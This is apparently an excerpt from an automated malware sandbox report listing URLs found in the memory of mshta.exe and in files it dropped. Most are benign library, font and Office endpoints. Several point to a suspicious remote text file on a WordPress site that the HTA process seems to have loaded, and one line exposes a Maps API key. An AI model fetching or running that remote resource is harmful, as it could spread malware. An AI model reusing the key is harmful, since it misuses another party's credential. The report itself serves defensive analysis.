Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#mD9
Source: mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#rz
Source: mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#top
Source: mshta.exe, 0000000A.00000002.536259584.00000000034C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt$
Source: mshta.exe, 0000000A.00000003.386140675.0000000006B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt)y
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt...
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387469878.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.536752026.00000000034E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt...t
Source: mshta.exe, 0000000A.00000003.332044641.0000000006B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt0y
Source: mshta.exe, 0000000A.00000003.332911696.00000000070C3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.544849702.00000000070C2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.385933121.00000000070A9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387051343.00000000070C1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot
Source: mshta.exe, 0000000A.00000003.320709987.0000000006BFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332510512.000000000714A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332337430.0000000007135000.00000004.00000800.00020000.00000000.sdmp, css[2].css.10.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);L
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotodernizr.js?ver=2.0.6
Source: mshta.exe, 0000000A.00000003.386063052.0000000007133000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545320205.0000000007133000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot
Source: mshta.exe, 0000000A.00000003.320713563.0000000006C03000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.303078628.0000000006BDD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.303052701.0000000006BDD000.00000004.00000800.00020000.00000000.sdmp, css[3].css.10.dr, css[1].css.10.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);
Source: mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);EOSZZ
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);a
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);e
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot:.55;-ms-opacity:.55;0.67/
Source: mshta.exe, 0000000A.00000003.386063052.0000000007133000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545320205.0000000007133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eotC:
Source: mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eotK
Source: js[1].js.10.drString found in binary or memory: http://g.co/dev/maps-no-account
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, jquery.mobilemenu[1].js.10.drString found in binary or memory: http://github.com/mambows/mobilemenu
Source: style[1].css.10.drString found in binary or memory: http://info.template-help.com/help/
Source: mshta.exe, 0000000A.00000003.387366478.000000000CCBD000.00000004.00000800.00020000.00000000.sdmp, jquery.mobilemenu[1].js.10.drString found in binary or memory: http://jquery.com
Source: js[1].js.10.drString found in binary or memory: http://khm.googleapis.com/mz?v=928
Source: js[1].js.10.drString found in binary or memory: http://khm0.googleapis.com/kh?v=143
Source: js[1].js.10.drString found in binary or memory: http://khm0.googleapis.com/kh?v=928
Source: js[1].js.10.drString found in binary or memory: http://khm1.googleapis.com/kh?v=143
Source: js[1].js.10.drString found in binary or memory: http://khm1.googleapis.com/kh?v=928
Source: mshta.exe, 0000000A.00000003.303044900.0000000006BD3000.00000004.00000800.00020000.00000000.sdmp, font-awesome[1].css.10.drString found in binary or memory: http://kyruus.com
Source: js[1].js.10.drString found in binary or memory: http://maps.googleapis.com
Source: mshta.exe, 0000000A.00000003.332768718.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537609183.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387290673.000000000353C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/
Source: js[1].js.10.drString found in binary or memory: http://maps.googleapis.com/maps-api-v3/api/js/49/12
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387227978.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537862942.0000000003554000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/maps/api/js?v=3.exp&key=AIzaSyBXSoaDpFMSx5Mw41I7DfRd1h7fJUulK_0
Source: mshta.exe, 0000000A.00000002.545468854.000000000714D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332924179.00000000070CF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/maps/api/js?v=3.exp&key=AIzaSyBXSoaDpFMSx5Mw41I7DfRd1h7fJUulK_0#038;ver=4
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/maps/api/js?v=3.exp&key=AIzaSyBXSoaDpFMSx5Mw41I7DfRd1h7fJUulK_0J6
Source: js[1].js.10.drString found in binary or memory: http://maps.googleapis.com/maps/vt
Source: js[1].js.10.drString found in binary or memory: http://maps.gstatic.com/mapfiles/
Source: js[1].js.10.drString found in binary or memory: http://maps.gstatic.com/maps-api-v3/api/images/
Source: js[1].js.10.drString found in binary or memory: http://mt.googleapis.com/maps/vt/icon
Source: mshta.exe, 0000000A.00000003.332768718.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537609183.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387290673.000000000353C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/
Source: mshta.exe, 0000000A.00000003.332768718.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537609183.000000000353C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387290673.000000000353C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/J
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1?ver=2.9.2
Source: mshta.exe, 0000000A.00000002.542517709.0000000006B39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332283866.0000000006B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1es/C:
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1o
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1c-
Source: mshta.exe, 0000000A.00000003.346895131.0000000006CAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ad
Source: mshta.exe, 0000000A.00000003.346895131.0000000006CAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adbe.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: mshta.exe, 0000000A.00000003.386469392.000000000CF35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386732370.00000000071E7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.314619092.000000000710A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.557430955.000000000CF35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.546209264.00000000071EA000.00000004.00000800.00020000.00000000.sdmp, jquery.jplayer.min[1].js.10.dr, animate-logo[1].css.10.drString found in binary or memory: http://opensource.org/licenses/MIT
Source: mshta.exe, 0000000A.00000003.303044900.0000000006BD3000.00000004.00000800.00020000.00000000.sdmp, font-awesome[1].css.10.drString found in binary or memory: http://opensource.org/licenses/mit-license.html
Source: mshta.exe, 0000000A.00000002.554612523.000000000BD10000.00000004.00000800.00020000.00000000.sdmp, font-awesome[1].css.10.drString found in binary or memory: http://scripts.sil.org/OFL
Source: mshta.exe, 0000000A.00000003.343634753.0000000006CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scripts.sil.org/OFL$$
Source: mshta.exe, 0000000A.00000002.543184834.0000000006BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://static.panoramio.com.storage.googleapis.com/phoW
Source: js[1].js.10.drString found in binary or memory: http://static.panoramio.com.storage.googleapis.com/photos/
Source: mshta.exe, 0000000A.00000002.541911720.0000000006AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/
Source: mshta.exe, 0000000A.00000002.541911720.0000000006AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/_
Source: mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg
Source: mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg.js?ver=1.3e
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/
Source: mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332073316.0000000006B65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/W
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.548501961.0000000007680000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386191598.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386488905.000000000CCEE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556680708.000000000CCF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.542729390.0000000006B65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332104542.0000000006B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 0000000A.00000003.332781130.000000000354C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386985123.0000000003562000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.537988127.0000000003564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit23
Source: mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2TV-
Source: mshta.exe, 0000000A.00000003.303044900.0000000006BD3000.00000004.00000800.00020000.00000000.sdmp, font-awesome[1].css.10.drString found in binary or memory: http://twitter.com/byscuits
Source: mshta.exe, 0000000A.00000003.303044900.0000000006BD3000.00000004.00000800.00020000.00000000.sdmp, font-awesome[1].css.10.drString found in binary or memory: http://twitter.com/fontawesome.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: responsive[1].css.10.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 0000000A.00000003.386551302.000000000CD31000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.556774271.000000000CD31000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332510512.000000000714A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332337430.0000000007135000.00000004.00000800.00020000.00000000.sdmp, bootstrap.min[1].js.10.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
Source: mshta.exe, 0000000A.00000003.303502984.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.303066944.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.303083813.0000000006BE5000.00000004.00000800.00020000.00000000.sdmp, js[1].js.10.drString found in binary or memory: http://www.broofa.com
Source: mshta.exe, 0000000A.00000002.557363777.000000000CF0E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386732370.00000000071E7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387016057.000000000CF0C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.546209264.00000000071EA000.00000004.00000800.00020000.00000000.sdmp, jplayer.playlist.min[1].js.10.drString found in binary or memory: http://www.gnu.org/copyleft/gpl.html
Source: flexslider[1].css.10.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: js[1].js.10.drString found in binary or memory: http://www.google.com/maps/preview/log204
Source: mshta.exe, 0000000A.00000003.386469392.000000000CF35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.557363777.000000000CF0E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386732370.00000000071E7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387016057.000000000CF0C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.557430955.000000000CF35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.546209264.00000000071EA000.00000004.00000800.00020000.00000000.sdmp, jquery.jplayer.min[1].js.10.dr, jplayer.playlist.min[1].js.10.drString found in binary or memory: http://www.jplayer.org
Source: mshta.exe, 0000000A.00000002.557557475.000000000D1F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.macromedia.com
Source: mshta.exe, 0000000A.00000002.557363777.000000000CF0E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387016057.000000000CF0C000.00000004.00000800.00020000.00000000.sdmp, jquery.mousewheel.min[1].js.10.drString found in binary or memory: http://www.mathias-bank.de)
Source: mshta.exe, 0000000A.00000002.556911934.000000000CD62000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332510512.000000000714A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386403873.000000000CD62000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.557363777.000000000CF0E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.332337430.0000000007135000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545850187.0000000007190000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387670295.000000000CE74000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.386732370.00000000071E7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.387016057.000000000CF0C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.546209264.00000000071EA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.557285067.000000000CE72000.00000004.00000800.00020000.00000000.sdmp, swfobject[1].js.10.dr, camera.min[1].js.10.dr, jplayer.playlist.min[1].js.10.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: flexslider[1].css.10.drString found in binary or memory: http://www.woothemes.com/flexslider/
Source: mshta.exe, 0000000A.00000003.338685596.0000000006CAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000003.338645699.0000000006CAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://)S#j.background
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.aadrm.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.aadrm.com/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.cortana.ai
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.office.net
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.onedrive.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: mshta.exe, 0000000A.00000003.332658393.00000000034E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: mshta.exe, 0000000A.00000003.386063052.0000000007133000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.545320205.0000000007133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/P
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: mshta.exe, 0000000A.00000002.556298812.000000000CC90000.00000004.00000800.00020000.00000000.sdmp, owl.carousel[1].js.10.drString found in binary or memory: https://app.vzaar.com/videos/:id
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://augloop.office.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://augloop.office.com/v2
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: js[1].js.10.drString found in binary or memory: https://cbks0.googleapis.com/cbk?
Source: js[1].js.10.drString found in binary or memory: https://cbks1.googleapis.com/cbk?
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://cdn.entity.
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office.com
Source: B16A525F-3CD4-4D75-9102-9C1BBE18B5D5.0.drString found in binary or memory: https://outlook.office.com/
